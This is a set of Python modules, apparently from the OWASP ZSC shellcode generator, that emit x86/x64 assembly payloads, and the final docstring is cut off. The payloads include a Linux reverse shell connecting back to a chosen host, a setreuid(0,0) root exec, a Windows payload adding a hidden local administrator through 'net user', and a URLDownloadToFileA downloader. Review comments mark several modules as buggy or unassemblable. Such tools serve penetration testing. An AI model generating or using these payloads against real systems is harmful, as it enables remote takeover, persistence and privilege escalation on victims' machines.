ファイル: system.py プロジェクト: dmknght/ZSC
class Module(base_module.BasePayload):
    """Linux/x86 payload: run ``command`` through ``/bin/bash -c`` via execve.

    ``generate`` returns AT&T-syntax assembly, one instruction per line, that
    builds the three strings and the argv array on the stack and issues
    ``int $0x80`` with %eax = 0xb (execve in the i386 syscall table).
    """

    command = base_module.OptString("", "Command to execute")

    def generate(self) -> str:
        """Return the assembly for execve("/bin/bash", ["/bin/bash", "-c", command, ...], NULL)."""

        def asm(*instructions):
            # One newline-terminated instruction per line, the format the
            # other payload modules emit.
            return "".join(f"{ins}\n" for ins in instructions)

        # %eax = 0xb; cltd sign-extends %eax into %edx, which yields a zero
        # register (used as NUL terminator and envp) without a NUL byte in
        # the encoding.
        setup = asm("push $0xb", "pop %eax", "cltd", "push %edx")
        # The command string, terminated by the zero dword pushed above; its
        # address is kept in %esi for argv[2].
        command_on_stack = stack.generate(self.command, '%ecx', 'string')
        # "-c\0\0": 0x632d9090 >> 16 == 0x632d ("-c" little-endian); the 0x90
        # filler keeps the immediate free of NUL bytes. Address -> %ecx (argv[1]).
        dash_c = asm(
            "mov %esp, %esi",
            "push %edx",
            "push $0x632d9090",
            "pop %ecx",
            "shr $0x10, %ecx",
            "push %ecx",
            "mov %esp, %ecx",
        )
        # "/bin/bash\0": 'h' (plus three zero bytes), "/bas", "/bin" pushed in
        # reverse order. Address -> %ebx (execve's filename argument).
        bash_path = asm(
            "push %edx",
            "push $0x68",
            "push $0x7361622f",
            "push $0x6e69622f",
            "mov %esp, %ebx",
        )
        # argv = [%ebx, %ecx, %esi, %edi, NULL], built by pushing in reverse;
        # %ecx then points at it and %edx (0) serves as envp.
        # NOTE(review): %edi is pushed into argv without ever being set here,
        # so argv[3] is whatever the register held on entry. Unless that is
        # NULL or a valid pointer, execve fails (EFAULT) — confirm the
        # entry register state or drop the push.
        argv_and_call = asm(
            "push %edx",
            "push %edi",
            "push %esi",
            "push %ecx",
            "push %ebx",
            "mov %esp, %ecx",
            "int $0x80",
        )
        return setup + command_on_stack + dash_c + bash_path + argv_and_call

    def run(self) -> None:
        """Refuse to build without a command, otherwise hand off to the framework."""
        if not self.command:
            alert.error("A command is required.")
            return
        self.handle_generate(__name__)
ファイル: rev_shell.py プロジェクト: dmknght/ZSC
class Module(base_module.BasePayload):
    """Linux/x86 reverse shell: connect to lhost:lport, duplicate the socket
    onto fds 2 and 1, then execve ``shell``.

    Syscalls go through ``int $0x80`` with i386 numbers: 0x66 socketcall
    (sub-call 1 = socket, 3 = connect), 0x3f dup2, 0xb execve.
    """

    lhost = base_module.OptIP("", "Listen IP address")
    lport = base_module.OptPort("", "Listen port")
    shell = base_module.OptString("/bin/sh", "Shell to execute")

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # socketcall(SYS_SOCKET, [AF_INET=2, SOCK_STREAM=1, 0]) -> %eax = sockfd.
        # NOTE(review): only %bl/%al are written, so the upper bytes of %ebx
        # and %eax are assumed to be zero on entry — confirm for the target.
        create_socket = asm(
            "mov $1, %bl",
            "push $0",
            "push $1",
            "push $2",
            "mov %esp, %ecx",
            "mov $0x66, %al",
            "int $0x80",
        )
        # sockaddr_in on the stack: sin_addr, then sin_port, then sin_family.
        # A port below 256 fits in %bl; larger ones need %bx.
        # NOTE(review): sin_port is big-endian on the wire, while `push %bx`
        # stores the immediate little-endian — confirm that OptPort (or the
        # operator) supplies the byte-swapped value.
        port_reg = "%bl" if self.lport < 256 else "%bx"
        sockaddr = asm(
            f"push ${stack.ipv4_to_hex(self.lhost)}",  # PUSH IP
            f"mov ${hex(self.lport)}, {port_reg}",  # MOV PORT
            "push %bx",
            "mov $0x2, %bl",
            "push %bx",
            "mov %esp, %ebx",
        )
        # socketcall(SYS_CONNECT, [sockfd, &sockaddr, 0x10]); the descriptor
        # is pushed a second time so it can be popped into %ebx afterwards.
        connect = asm(
            "push $0x10",
            "push %ebx",
            "push %eax",
            "mov %esp, %ecx",
            "mov $0x3, %bl",
            "push %eax",
            "mov $0x66, %al",
            "int $0x80",
        )
        # dup2(sockfd, 2) then dup2(sockfd, 1).
        # NOTE(review): fd 0 is never duplicated, so the spawned shell reads
        # its commands from the original stdin rather than the socket —
        # confirm this is intended (a third dup2 with %ecx = 0 would fix it).
        dup_fds = asm(
            "pop %ebx",
            "mov $0x2, %cl",
            "mov $0x3f, %al",
            "int $0x80",
            "dec %ecx",
            "mov $0x3f, %al",
            "int $0x80",
        )
        # execve(shell, [shell, NULL], NULL).
        exec_shell = stack.generate(self.shell, '%ebx', 'string') + asm(
            "mov %esp, %ebx",
            "xor %eax, %eax",
            "push %eax",
            "push %ebx",
            "mov %esp, %ecx",
            "xor %edx, %edx",
            "mov $0xb, %al",
            "int $0x80",
        )
        return create_socket + sockaddr + connect + dup_fds + exec_shell

    def run(self) -> None:
        """Require both listener options, then hand off to the framework."""
        if not self.lhost:
            alert.error("Listen address")
            return
        if not self.lport:
            alert.error("Listen port")
            return
        self.handle_generate(__name__)
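class Module(base_module.BaseModule):
    """Obfuscate a script file *in place*.

    The obfuscator is imported as
    ``owasp_zsc.libs.obfuscate.<type>.<method>`` and its
    ``ObfuscateModule().start(content)`` result overwrites ``file``.
    """

    file = base_module.OptString("", "File to obfuscate")
    type = base_module.OptString("", "File type")
    # NOTE(review): ``method`` and ``times`` are read in run() but are not
    # declared on this class — presumably provided by the base class; confirm.

    def run(self) -> None:
        """Validate options, load the obfuscator and rewrite ``file``.

        Failures are reported through ``alert`` with a traceback; nothing is
        raised to the caller.
        """
        if not self.file:
            alert.error("File option is required")
            return
        if not self.type:
            alert.error("File type is required")
            return
        if not self.method:
            alert.error("An obfuscation method is required")
            return
        from owasp_zsc.libs import obfuscate
        import importlib
        try:
            # Build the dotted name from the package itself rather than by
            # slicing its filesystem path: the previous
            # ``__path__[0].split("owasp_zsc")[1].replace("/", ".")`` broke on
            # Windows separators and on install prefixes containing "owasp_zsc".
            module_name = f"{obfuscate.__name__}.{self.type}.{self.method}"
            obfuscator = importlib.import_module(module_name).ObfuscateModule()
            if hasattr(obfuscator, "times"):
                # FIX submodule doesn't take new times from options
                obfuscator.times = self.times

            alert.info("Getting file content")
            with open(self.file) as src:
                content = src.read()
            if not content.strip():
                alert.error("File is empty!")
                return

            alert.info("Obfuscating file content")
            obfuscated_content = obfuscator.start(content)

            alert.info("Generating obfuscated script")
            # Destructive: the original file is overwritten, no backup is kept.
            with open(self.file, "w") as dst:
                dst.write(obfuscated_content)

            alert.info("Completed. Your file is obfuscated.")
        except (ImportError, AttributeError):
            # Unknown <type>/<method>, or a module without ObfuscateModule.
            traceback.print_exc()
            alert.error("Invalid module")
        except Exception:
            # Was a bare ``except:``; narrowed so Ctrl-C still interrupts.
            traceback.print_exc()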
ファイル: write.py プロジェクト: dmknght/ZSC
class Module(base_module.BasePayload):
    """Linux/x86 payload: open ``target_file`` and write ``content`` into it.

    Emits AT&T assembly for open (0x5), write (0x4) and exit (0x1) in the
    i386 syscall table, one instruction per line.
    """
    # FIXME 1: program crashes when full path of file is too long
    # FIXME 2: file contents is not contents only
    target_file = base_module.OptString("", "File to write data")
    content = base_module.OptString("", "File's data")

    def generate(self) -> str:
        """Return the assembly text."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # A path whose length is a multiple of 4 fills its last pushed dword
        # completely, so a zero dword must be pushed first to terminate it;
        # otherwise the stack helper's padding already does that.
        terminator = "" if len(self.target_file) % 4 else "xor %ebx, %ebx\npush %ebx\n"

        # open(path, 0x401): the flags are loaded as 0x4014141 >> 16 to keep
        # NUL bytes out of the immediate. 0x401 is O_WRONLY|O_APPEND on
        # Linux/x86, which matches FIXME 2 above (existing data is kept).
        open_call = (
            asm("push $0x5", "pop %eax")
            + terminator
            + stack.generate(str(self.target_file), '%ebx', 'string')
            + asm(
                "mov %esp, %ebx",
                "push $0x4014141",
                "pop %ecx",
                "shr $0x10, %ecx",
                "int $0x80",
            )
        )
        # write(fd, content, len(content)); the fd returned in %eax moves to %ebx.
        write_call = (
            asm("mov %eax, %ebx", "push $0x4", "pop %eax")
            + stack.generate(str(self.content), '%ecx', 'string')
            + asm("mov %esp, %ecx")
            + stack.generate(str(len(self.content)), '%edx', 'int')
            + asm("int $0x80")
        )
        # exit(1). Only the low bytes of %eax/%ebx are written; if write()
        # failed, %eax still holds -errno in its upper bytes and the syscall
        # number is wrong — NOTE(review), confirm this is acceptable.
        exit_call = asm("mov $0x1, %al", "mov $0x1, %bl", "int $0x80")
        return open_call + write_call + exit_call

    def run(self) -> None:
        """Require both options, then hand off to the framework."""
        if not self.target_file:
            alert.error("Target file is required")
            return
        if not self.content:
            alert.error("File's content is required")
            return
        self.handle_generate(__name__)
ファイル: chmod.py プロジェクト: dmknght/ZSC
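class Module(base_module.BasePayload):
    """Linux/x86 payload: chmod(file_dest, perm) then exit(1).

    Previously the instructions were concatenated with no line breaks and
    used ``%%`` register prefixes (the escaping needed inside printf-style
    formats or C inline asm, not in a .s file), so the printed text could not
    be assembled. The instruction stream itself is unchanged.
    """

    perm = base_module.OptString("", "Permission mask")  # TODO improve descr
    file_dest = base_module.OptString("", "File Target")  # TODO improve descr

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # NOTE(review): the path address is saved in %edx and pushed, but %ebx
        # (chmod's path argument) is never loaded, and the ``push $0x2a``
        # right before the syscall has no evident purpose. The other chmod.py
        # listing in this file does ``mov %esp, %ebx`` before ``int $0x80``;
        # this variant likely never worked as intended — confirm before use.
        return (
            asm("xor    %eax, %eax", "push   %eax")
            + stack.generate(self.file_dest, '%ebx', 'string')
            + asm("mov    %esp, %edx")
            + stack.generate(self.perm, '%ecx', 'int')
            + asm(
                "push   %edx",
                "push   $0xf",
                "pop    %eax",
                "push   $0x2a",
                "int    $0x80",
                "mov    $0x01, %al",
                "mov    $0x01, %bl",
                "int    $0x80",
            )
        )

    def run(self) -> None:
        """Print the generated assembly (no option validation, unlike the newer chmod module)."""
        print(self.generate())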
ファイル: chmod.py プロジェクト: dmknght/ZSC
class Module(base_module.BasePayload):
    """Linux/x86 payload: chmod(target_file, permission) then exit(1)."""

    target_file = base_module.OptString("", "Target file to change permission")
    permission = base_module.OptString("", "Permission mask (number)")

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # %eax = 0xf (chmod in the i386 table); the mode is loaded into %ecx
        # by the stack helper, then the path is pushed and its address taken
        # into %ebx immediately before the syscall.
        chmod_call = (
            asm("push $0x0f", "pop %eax")
            + stack.generate(self.permission, '%ecx', 'int')
            + stack.generate(self.target_file, '%ebx', 'string')
            + asm("mov %esp, %ebx", "int $0x80")
        )
        # exit(1): only %al/%bl are written. NOTE(review): if chmod failed,
        # %eax holds -errno and its upper bytes make the syscall number wrong,
        # after which execution falls off the end of the payload — confirm.
        exit_call = asm("mov $0x01, %al", "mov $0x01, %bl", "int $0x80")
        return chmod_call + exit_call

    def run(self) -> None:
        """Require both options, then hand off to the framework."""
        if not self.target_file:
            alert.error("Target file and file's permissions are required")
            return
        if not self.permission:
            alert.error("Target's permission is required")
            return
        self.handle_generate(__name__)
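class Module(base_module.BasePayload):
    """Linux/x86 payload: execve-style call on ``file_dest`` followed by exit(1).

    Previously the instructions were concatenated with no line breaks and
    used ``%%`` register prefixes (escaping for printf-style formats / C
    inline asm), so the output could not be assembled. The instruction
    stream itself is unchanged.
    """

    file_dest = base_module.OptString("", "Destination file")

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # Path on the stack -> %ebx; a zero dword -> %edx (envp); a one-entry
        # argv [%ebx] -> %ecx; then the three are pushed again before the call.
        # NOTE(review): the syscall number is loaded as 0x3b. In the i386
        # ``int $0x80`` table execve is 0xb (as the other execute module in
        # this file uses); 0x3b is execve only in the x86-64 numbering —
        # confirm the intended target before relying on this payload.
        # NOTE(review): ``push $0x2a`` right before the syscall has no
        # evident purpose.
        return (
            stack.generate(self.file_dest, '%ebx', 'string')
            + asm(
                "mov    %esp, %ebx",
                "xor    %eax, %eax",
                "push   %eax",
                "mov    %esp, %edx",
                "push   %ebx",
                "mov    %esp, %ecx",
                "push   %edx",
                "push   %ecx",
                "push   %ebx",
                "mov    $0x3b, %al",
                "push   $0x2a",
                "int    $0x80",
                "mov    $0x1, %al",
                "mov    $0x1, %bl",
                "int    $0x80",
            )
        )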
class Module(base_module.BasePayload):
    """Linux/x86 payload: setreuid(0, 0), execve(target_file, NULL, NULL), exit(1)."""

    target_file = base_module.OptString("", "Target file to execute file")

    def generate(self) -> str:
        """Return the AT&T assembly text.

        Every instruction is newline-terminated except the very last one,
        exactly as this module has always emitted it.
        """
        # 0x46 is setreuid in the i386 table; %ebx = %ecx = 0 -> setreuid(0, 0).
        # Only %al is written, so the upper bytes of %eax are assumed clear.
        become_root = "\n".join([
            "mov  $0x46, %al",
            "xor  %ebx, %ebx",
            "xor  %ecx, %ecx",
            "int  $0x80",
        ]) + "\n"
        # execve(path, argv, envp): %ecx is still 0 from above (argv = NULL).
        # NOTE(review): %edx (envp) is never set here, so it holds whatever
        # the register contained on entry; unless that is NULL the call fails
        # with EFAULT — confirm or add ``xor %edx, %edx``.
        # The trailing exit(1) only rewrites %al/%bl; after a failed execve
        # %eax holds -errno, so the syscall number would be wrong.
        exec_target = (
            stack.generate(self.target_file, '%ebx', 'string')
            + "\n".join([
                "mov  %esp, %ebx",
                "xor  %eax, %eax",
                "mov  $0xb, %al",
                "int  $0x80",
                "mov  $0x1, %al",
                "mov  $0x1, %bl",
                "int  $0x80",
            ])
        )
        return become_root + exec_target

    def run(self) -> None:
        """Require the target path, then hand off to the framework."""
        if not self.target_file:
            alert.error("Target file is required")
            return
        self.handle_generate(__name__)
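class Module(base_module.BasePayload):
    """Windows/x86 payload: add a local administrator with ``net user`` via WinExec, then ExitProcess.

    GetProcAddress is located by walking the PEB loader list to kernel32 and
    scanning its export-name table for "GetProcAddre"; WinExec and
    ExitProcess are then resolved by name at run time.

    Previously the instructions were concatenated with no line breaks, so
    the printed text was one unassemblable line. The instruction stream is
    unchanged.
    """

    username = base_module.OptString("", "Username")
    password = base_module.OptString("", "Password")

    def generate(self, command, cvtcommand) -> str:
        """Return the AT&T assembly text, one instruction per line.

        Args:
            command: assembly (from ``stack.generate``) that pushes the
                command line onto the stack; its address becomes WinExec's
                first argument.
            cvtcommand: hex string of the byte count to add back to %esp
                after WinExec returns (8 + the command's dword-padded length).
        """

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # TEB->PEB (fs:0x30) -> Ldr (+0xc) -> InMemoryOrderModuleList (+0x14);
        # two list hops reach the kernel32 entry, DllBase at +0x10 from the
        # link. PE header (+0x3c) -> export directory (+0x78) -> AddressOfNames
        # (+0x20), scanned for the dwords "GetP" "rocA" "ddre".
        # NOTE(review): ``jne 23 <.text+0x23>`` is objdump output, not
        # assembler input — GAS needs a label for the scan loop. Confirm the
        # assembly step rewrites these before relying on this module.
        find_getprocaddress = asm(
            "xor    %ecx, %ecx",
            "mov    %fs:0x30(%ecx), %eax",
            "mov    0xc(%eax), %eax",
            "mov    0x14(%eax), %esi",
            "lods   %ds:(%esi), %eax",
            "xchg   %eax, %esi",
            "lods   %ds:(%esi), %eax",
            "mov    0x10(%eax), %ebx",
            "mov    0x3c(%ebx), %edx",
            "add    %ebx, %edx",
            "mov    0x78(%edx), %edx",
            "add    %ebx, %edx",
            "mov    0x20(%edx), %esi",
            "add    %ebx, %esi",
            "xor    %ecx, %ecx",
            "inc    %ecx",
            "lods   %ds:(%esi), %eax",
            "add    %ebx, %eax",
            "cmpl   $0x50746547, (%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x41636f72, 0x4(%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x65726464, 0x8(%eax)",
            "jne    23 <.text+0x23>",
            "mov    0x24(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 2), %cx",
            "dec    %ecx",
            "mov    0x1c(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 4), %edx",
            "add    %ebx, %edx",
        )
        # Save kernel32 base (%ebx) and GetProcAddress (%edx); build "WinExec"
        # ("xeca" with its 'a' zeroed in place, then "WinE") and resolve it.
        resolve_winexec = asm(
            "push   %ebx",
            "push   %edx",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "mov    $0x61636578, %ecx",
            "push   %ecx",
            "subl   $0x61, 0x3(%esp)",
            "push   $0x456e6957",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "add    $0x8, %esp",
            "pop    %ecx",
        )
        # WinExec(command, 1): the WinExec pointer is parked on the stack, the
        # command pushed NUL-terminated and its address taken into %ebx; after
        # the (stdcall) call %esp is restored by ``cvtcommand`` and the saved
        # GetProcAddress / kernel32 values are popped back.
        call_winexec = (
            asm("push   %eax", "xor    %ecx, %ecx", "push   %ecx")
            + command
            + asm(
                "xor    %ebx, %ebx",
                "mov    %esp, %ebx",
                "xor    %ecx, %ecx",
                "inc    %ecx",
                "push   %ecx",
                "push   %ebx",
                "call   *%eax",
                f"add    ${cvtcommand}, %esp",
                "pop    %edx",
                "pop    %ebx",
            )
        )
        # ExitProcess(0): "essa" (with 'a' zeroed) "Proc" "Exit" -> resolve -> call.
        exit_process = asm(
            "xor    %ecx, %ecx",
            "mov    $0x61737365, %ecx",
            "push   %ecx",
            "subl   $0x61, 0x3(%esp)",
            "push   $0x636f7250",
            "push   $0x74697845",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "call   *%eax",
        )
        return find_getprocaddress + resolve_winexec + call_winexec + exit_process

    def run(self) -> None:
        """Build the ``net user`` command line and print the assembly.

        NOTE(review): username/password are interpolated unquoted, so values
        containing spaces or cmd.exe metacharacters (&, |, >, %) change the
        command; unlike sibling modules, empty options are not rejected here.
        """
        command = f"cmd.exe /c net user {self.username} {self.password} /add && " \
                  f"net localgroup administrators {self.username} /add "
        # Stack bytes to release after WinExec: 8 plus the command rounded up
        # to a whole number of dwords.
        cleanup = hex(int(8 + 4 * (ceil(len(command) / float(4)))))
        print(self.generate(stack.generate(command, "%ecx", "string"), cleanup))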
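class Module(base_module.BasePayload):
    """Windows/x86 payload: WinExec(target_file, SW_SHOWNORMAL) then ExitProcess(0).

    GetProcAddress is located by walking the PEB loader list to kernel32 and
    scanning its export-name table for "GetProcAddre"; WinExec and
    ExitProcess are then resolved by name at run time.
    """

    target_file = base_module.OptString("", "Target file to execute")

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # TEB->PEB (fs:0x30) -> Ldr (+0xc) -> InMemoryOrderModuleList (+0x14);
        # two list hops reach the kernel32 entry, DllBase at +0x10 from the
        # link. PE header (+0x3c) -> export directory (+0x78) -> AddressOfNames
        # (+0x20), scanned for the dwords "GetP" "rocA" "ddre".
        # NOTE(review): ``jne 23 <.text+0x23>`` is objdump output, not
        # assembler input; unless handle_generate rewrites it, the scan loop
        # needs a label.
        find_getprocaddress = asm(
            "xor %ecx, %ecx",
            "mov %fs:0x30(%ecx), %eax",
            "mov 0xc(%eax), %eax",
            "mov 0x14(%eax), %esi",
            "lods %ds:(%esi), %eax",
            "xchg %eax, %esi",
            "lods %ds:(%esi), %eax",
            "mov 0x10(%eax), %ebx",
            "mov 0x3c(%ebx), %edx",
            "add %ebx, %edx",
            "mov 0x78(%edx), %edx",
            "add %ebx, %edx",
            "mov 0x20(%edx), %esi",
            "add %ebx, %esi",
            "xor %ecx, %ecx",
            "inc %ecx",
            "lods %ds:(%esi), %eax",
            "add %ebx, %eax",
            "cmpl $0x50746547, (%eax)",
            "jne 23 <.text+0x23>",
            "cmpl $0x41636f72, 0x4(%eax)",
            "jne 23 <.text+0x23>",
            "cmpl $0x65726464, 0x8(%eax)",
            "jne 23 <.text+0x23>",
            "mov 0x24(%edx), %esi",
            "add %ebx, %esi",
            "mov (%esi, %ecx, 2), %cx",
            "dec %ecx",
            "mov 0x1c(%edx), %esi",
            "add %ebx, %esi",
            "mov (%esi, %ecx, 4), %edx",
            "add %ebx, %edx",
        )
        # Save kernel32 base (%ebx) and GetProcAddress (%edx); build "WinExec"
        # ("xeca" with its 'a' zeroed in place, then "WinE") and resolve it.
        resolve_winexec = asm(
            "push %ebx",
            "push %edx",
            "xor %ecx, %ecx",
            "push %ecx",
            "mov $0x61636578, %ecx",
            "push %ecx",
            "subl $0x61, 0x3(%esp)",
            "push $0x456e6957",
            "push %esp",
            "push %ebx",
            "call *%edx",
            "add $0x8, %esp",
            "pop %ecx",
        )
        # WinExec(target_file, 1): the WinExec pointer is parked on the stack,
        # the path pushed NUL-terminated and its address taken into %ebx.
        # Afterwards %esp is restored by 8 + the path's dword-padded length
        # (WinExec is stdcall, so only the terminator and the parked pointer
        # plus the string remain) and the saved values are popped back.
        cleanup = hex(int(8 + 4 * (ceil(len(self.target_file) / float(4)))))
        call_winexec = (
            asm("push %eax", "xor %ecx, %ecx", "push %ecx")
            + stack.generate(self.target_file, "%ecx", "string")
            + asm(
                "xor %ebx, %ebx",
                "mov %esp, %ebx",
                "xor %ecx, %ecx",
                "inc %ecx",
                "push %ecx",
                "push %ebx",
                "call *%eax",
                f"add ${cleanup}, %esp",
                "pop %edx",
                "pop %ebx",
            )
        )
        # ExitProcess(0): "essa" (with 'a' zeroed) "Proc" "Exit" -> resolve -> call.
        exit_process = asm(
            "xor %ecx, %ecx",
            "mov $0x61737365, %ecx",
            "push %ecx",
            "subl $0x61, 0x3(%esp)",
            "push $0x636f7250",
            "push $0x74697845",
            "push %esp",
            "push %ebx",
            "call *%edx",
            "xor %ecx, %ecx",
            "push %ecx",
            "call *%eax",
        )
        return find_getprocaddress + resolve_winexec + call_winexec + exit_process

    def run(self) -> None:
        """Require the target path, then hand off to the framework."""
        if not self.target_file:
            # The previous message was the chmod module's text pasted in by mistake.
            alert.error("Target file is required")
            return
        import traceback
        try:
            self.handle_generate(__name__)
        except Exception:
            # Was a bare ``except:``, which also swallowed Ctrl-C.
            traceback.print_exc()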
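class Module(base_module.BasePayload):
    """Windows/x64 listing: resolve WinExec/ExitProcess by ROR-13 hash and run a program.

    NOTE(review): this is a pasted objdump disassembly, not assembler source.
    The ``callq 0x401067`` / ``jmp 0x401059`` / ``je 0x4010a7`` targets are
    absolute addresses from the binary it was dumped from, and the lines from
    ``movslq 0x6c(%rcx), %esp`` through ``int $0x67`` appear to be the
    embedded program-name string (the bytes spell "calc.exe") decoded as
    instructions. It cannot be assembled into a position-independent payload
    as-is, and the ``file_dest`` option is never used. The exec-intel.py
    listing in this file holds the NASM source this was dumped from.

    Previously the lines were also concatenated with no separators; they are
    now emitted one per line, otherwise unchanged.
    """

    file_dest = base_module.OptString("", "File dest")  # TODO improve descr

    def generate(self) -> str:
        """Return the disassembly text, one line per instruction."""
        lines = [
            "sub    $0x20, %rsp",
            "and    $0xfffffffffffffff0, %rsp",
            "mov    %gs:0x60, %r12",
            "mov    0x18(%r12), %r12",
            "mov    0x20(%r12), %r12",
            "mov    (%r12), %r12",
            "mov    0x20(%r12), %r15",
            "mov    (%r12), %r12",
            "mov    0x20(%r12), %r12",
            "mov    $0xe8afe98, %rdx",
            "mov    %r12, %rcx",
            "mov    %r12, %r12",
            "callq  0x401067",
            "jmp    0x401059",
            "pop    %rcx",
            "mov    $0x1, %edx",
            "callq  *%rax",
            "mov    $0x2d3fcd70, %edx",
            "mov    %r15, %rcx",
            "callq  0x401067",
            "xor    %rcx, %rcx",
            "callq  *%rax",
            "callq  0x40103f",
            "movslq 0x6c(%rcx), %esp",
            "movslq (%rsi), %ebp",
            "gs js  0x4010cb",
            "add    %cl, -0x77(%rcx)",
            "int    $0x67",
            "mov    0x3c(%r13), %eax",
            "mov    0x88(%r13d, %eax, 1), %r14d",
            "add    %r13d, %r14d",
            "mov    0x18(%r14d), %r10d",
            "mov    0x20(%r14d), %ebx",
            "add    %r13d, %ebx",
            "jecxz  0x4010ca",
            "dec    %r10d",
            "mov    (%ebx, %r10d, 4), %esi",
            "add    %r13d, %esi",
            "xor    %edi, %edi",
            "xor    %eax, %eax",
            "cld",
            "lodsb   %ds:(%rsi), %al",
            "test   %al, %al",
            "je     0x4010a7",
            "ror    $0xd, %edi",
            "add    %eax, %edi",
            "jmp    0x40109b",
            "cmp    %edx, %edi",
            "jne    0x401088",
            "mov    0x24(%r14d), %ebx",
            "add    %r13d, %ebx",
            "xor    %ecx, %ecx",
            "mov    (%ebx, %r10d, 2), %cx",
            "mov    0x1c(%r14d), %ebx",
            "add    %r13d, %ebx",
            "mov    (%ebx, %ecx, 4), %eax",
            "add    %r13d, %eax",
            "retq",
            "add    %al, (%rax)",
            "add    %al, (%rax)",
        ]
        return "".join(f"{line}\n" for line in lines)

    def run(self) -> None:
        """Print the listing; ``file_dest`` is not consulted (see class docstring)."""
        print(self.generate())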
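class Module(base_module.BasePayload):
    """Windows/x86 payload: URLDownloadToFileA(url -> file_dest) then ExitProcess(0).

    GetProcAddress is located via the PEB/export-table walk, LoadLibraryA is
    resolved from kernel32 and used to load urlmon.dll, URLDownloadToFileA is
    resolved from it and called as (NULL, url, file_dest, 0, NULL).

    Two fixes: the instructions were concatenated with no line breaks (one
    unassemblable line), and the output path read ``self.filename``, an
    attribute this class never defines (AttributeError on every run) — the
    option is ``file_dest``.
    """

    url = base_module.OptString("", "URL to download")  # TODO improve descr
    file_dest = base_module.OptString("", "File name")  # TODO improve descr

    def generate(self) -> str:
        """Return the AT&T assembly text, one instruction per line."""

        def asm(*instructions):
            return "".join(f"{ins}\n" for ins in instructions)

        # PEB walk to kernel32 and scan of its export names for "GetProcAddre".
        # NOTE(review): ``jne 23 <.text+0x23>`` is objdump output and needs a
        # label before GAS will accept it — confirm the assembly step handles it.
        find_getprocaddress = asm(
            "xor    %ecx, %ecx",
            "mov    %fs:0x30(%ecx), %eax",
            "mov    0xc(%eax), %eax",
            "mov    0x14(%eax), %esi",
            "lods   %ds:(%esi), %eax",
            "xchg   %eax, %esi",
            "lods   %ds:(%esi), %eax",
            "mov    0x10(%eax), %ebx",
            "mov    0x3c(%ebx), %edx",
            "add    %ebx, %edx",
            "mov    0x78(%edx), %edx",
            "add    %ebx, %edx",
            "mov    0x20(%edx), %esi",
            "add    %ebx, %esi",
            "xor    %ecx, %ecx",
            "inc    %ecx",
            "lods   %ds:(%esi), %eax",
            "add    %ebx, %eax",
            "cmpl   $0x50746547, (%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x41636f72, 0x4(%eax)",
            "jne    23 <.text+0x23>",
            "cmpl   $0x65726464, 0x8(%eax)",
            "jne    23 <.text+0x23>",
            "mov    0x24(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 2), %cx",
            "dec    %ecx",
            "mov    0x1c(%edx), %esi",
            "add    %ebx, %esi",
            "mov    (%esi, %ecx, 4), %edx",
            "add    %ebx, %edx",
        )
        # %esi = GetProcAddress. Resolve "LoadLibraryA" ("aryA" "Libr" "Load")
        # and load "urlmon.dll" ("ll" "on.d" "urlm"); %eax = its module handle.
        load_urlmon = asm(
            "xor    %esi, %esi",
            "mov    %edx, %esi",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "push   $0x41797261",
            "push   $0x7262694c",
            "push   $0x64616f4c",
            "push   %esp",
            "push   %ebx",
            "call   *%edx",
            "xor    %ecx, %ecx",
            "mov    $0x6c6c, %cx",
            "push   %ecx",
            "push   $0x642e6e6f",
            "push   $0x6d6c7275",
            "push   %esp",
            "call   *%eax",
        )
        # GetProcAddress(urlmon, "URLDownloadToFileA") -> %eax.
        resolve_download = asm(
            "xor    %ecx, %ecx",
            "push   %ecx",
            "mov    $0x4165, %cx",
            "push   %ecx",
            "push   $0x6c69466f",
            "push   $0x5464616f",
            "push   $0x6c6e776f",
            "push   $0x444c5255",
            "mov    %esp, %ecx",
            "push   %ecx",
            "push   %eax",
            "call   *%esi",
        )
        # Push url (-> %edi) and file name (-> %edx), each after a zero dword
        # that terminates it, then URLDownloadToFileA(0, url, file, 0, 0).
        download = (
            asm("xor    %ecx, %ecx", "push   %ecx")
            + stack.generate(self.url, "%ecx", "string")
            + asm(
                "xor    %edi, %edi",
                "mov    %esp, %edi",
                "xor    %ecx, %ecx",
                "push   %ecx",
            )
            + stack.generate(self.file_dest, "%ecx", "string")
            + asm(
                "xor    %edx, %edx",
                "mov    %esp, %edx",
                "xor    %ecx, %ecx",
                "push   %ecx",
                "push   %ecx",
                "push   %edx",
                "push   %edi",
                "push   %ecx",
                "call   *%eax",
            )
        )
        # ExitProcess(0): "ess" comes from 0x73736590 >> 8, then "Proc" "Exit".
        exit_process = asm(
            "xor    %ecx, %ecx",
            "push   %ecx",
            "push   $0x73736590",
            "pop    %ecx",
            "shr    $0x8, %ecx",
            "push   %ecx",
            "push   $0x636f7250",
            "push   $0x74697845",
            "push   %esp",
            "push   %ebx",
            "call   *%esi",
            "xor    %ecx, %ecx",
            "push   %ecx",
            "call   *%eax",
        )
        return find_getprocaddress + load_urlmon + resolve_download + download + exit_process

    def run(self) -> None:
        """Print the assembly. NOTE(review): empty url/file_dest are not rejected here."""
        print(self.generate())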
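class Module(base_module.BasePayload):
    """Windows/x86 payload: write ``data`` to ``file_dest`` via msvcrt ``system("echo ... > ...")``.

    GetProcAddress is located via the PEB/export-table walk; LoadLibraryA
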